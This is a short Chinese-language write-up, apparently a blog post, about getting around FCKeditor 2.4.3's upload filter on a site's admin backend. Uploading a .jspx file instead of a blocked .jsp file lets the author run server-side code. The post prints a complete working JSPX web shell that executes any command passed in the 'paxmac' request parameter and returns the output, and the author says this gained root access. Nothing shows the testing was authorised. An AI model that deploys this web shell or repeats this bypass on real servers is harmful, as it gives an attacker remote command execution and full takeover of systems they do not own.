在進行測試的時候遇到了Fckeditor2.4.3
通過進入網站後臺,提升了種種權限,終於找到了一個編輯器用來嘗試上傳文件
發現直接上傳會返回202的錯誤。(不允許上傳文件類型)
通過網上各種信息的查詢知道Fck存在一個File類型文件上傳可以嘗試
發現可以上傳到File目錄,但是還不能上傳成功,因爲文件類型不允許。
這裏就嘗試查看File類型能上傳什麼文件看看有沒有利用的地方
發現稍微修改了一下jsp的後綴就可以上傳成功
嘗試了大小寫和文件夾,參數污染都無果後。就想試試能不能上傳可以解析爲jsp的其他文件。就嘗試了下jspx可以直接上傳成功
但是這時候需要一個jspx的小馬
就是如下內容
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
<jsp:directive.page import="java.io.*"/>
<html>
<head>
<title>jspx</title>
</head>
<body>
<jsp:scriptlet>
try {
String cmd = request.getParameter("paxmac");
if (cmd !=null){
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
} catch (IOException e) {
System.err.println(e);
}
</jsp:scriptlet>
</body>
</html>
</jsp:root>
獲得root權限~
如上測試都是尋找了網上的各種姿勢無果後選擇的方法,Fck的JSP目錄的上傳程序已經被刪= =防上傳了,但是萬萬沒想到沒ban jspx